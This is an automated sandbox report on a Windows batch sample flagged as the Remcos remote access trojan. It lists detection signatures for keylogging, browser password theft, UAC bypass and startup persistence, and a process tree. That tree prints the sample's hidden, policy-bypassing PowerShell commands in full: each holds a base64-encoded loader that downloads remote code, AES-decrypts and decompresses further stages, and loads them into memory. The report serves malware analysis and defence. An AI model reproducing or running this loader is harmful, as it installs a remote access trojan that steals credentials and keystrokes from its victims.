Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uowzo4rEa5.bat

Overview

General Information

Sample name:uowzo4rEa5.bat
renamed because original name is a hash value
Original sample name:e4f4afa1b85113656d4788a4f48fa5263b31b922d3e345093e082486193b0275.bat
Analysis ID:1612233
MD5:9dc9c00b77a0f0a41faf77a48d619e29
SHA1:f71cd56a14dc50b9f33d54dc6dfc0295d943c6b4
SHA256:e4f4afa1b85113656d4788a4f48fa5263b31b922d3e345093e082486193b0275
Tags:abokirem-duckdns-orgbatuser-JAMESWT_MHT
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains a sample name check
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Installs new ROOT certificates
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6844 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uowzo4rEa5.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6572 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\uowzo4rEa5.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1200 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRvZWVvdj0keHVwenouQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2Vlb3YuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRra2MgPSAkZW52OlVTRVJOQU1FOyR3bmp3ZiA9ICdDOlxVc2Vyc1wnICsgJGtrYyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHduandmOyR1bXFvaj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHduandmKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaGtsIGluICR1bXFvaikgewlpZiAoJGhrbC5TdGFydHNXaXRoKCc6OicpKQl7CQkkcGV6eXA9JGhrbC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZ2NvdXI9W3N0cmluZ1tdXSRwZXp5cC5TcGxpdCgnXCcpO0lFWCAnJGJldHJwPW9mZXRhIChwdGprcyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRnY291clswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRzYnZzaz1vZmV0YSAocHRqa3MgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZ2NvdXJbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7bGh5eHEgJGJldHJwICRudWxsO2xoeXhxICRzYnZzayAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | IEX" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7768 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qmkvvvalmabsljlqxrjezibbbpjp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7776 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qmkvvvalmabsljlqxrjezibbbpjp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7792 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\tgpownlmaitfopzcgbvycvwscdtqzgg" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7804 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\tgpownlmaitfopzcgbvycvwscdtqzgg" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7812 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\tgpownlmaitfopzcgbvycvwscdtqzgg" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7820 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\tgpownlmaitfopzcgbvycvwscdtqzgg" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7828 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\didgwgwgoqljydvgxmqznirblkkzsrxppo" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 7288 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_82916eff.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7340 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_82916eff.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7400 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRvZWVvdj0keHVwenouQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2Vlb3YuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRra2MgPSAkZW52OlVTRVJOQU1FOyR3bmp3ZiA9ICdDOlxVc2Vyc1wnICsgJGtrYyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHduandmOyR1bXFvaj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHduandmKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaGtsIGluICR1bXFvaikgewlpZiAoJGhrbC5TdGFydHNXaXRoKCc6OicpKQl7CQkkcGV6eXA9JGhrbC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZ2NvdXI9W3N0cmluZ1tdXSRwZXp5cC5TcGxpdCgnXCcpO0lFWCAnJGJldHJwPW9mZXRhIChwdGprcyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRnY291clswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRzYnZzaz1vZmV0YSAocHRqa3MgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZ2NvdXJbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7bGh5eHEgJGJldHJwICRudWxsO2xoeXhxICRzYnZzayAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | IEX" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 7872 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5d6f97d4.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7920 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5d6f97d4.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7976 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRvZWVvdj0keHVwenouQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2Vlb3YuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRra2MgPSAkZW52OlVTRVJOQU1FOyR3bmp3ZiA9ICdDOlxVc2Vyc1wnICsgJGtrYyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHduandmOyR1bXFvaj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHduandmKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaGtsIGluICR1bXFvaikgewlpZiAoJGhrbC5TdGFydHNX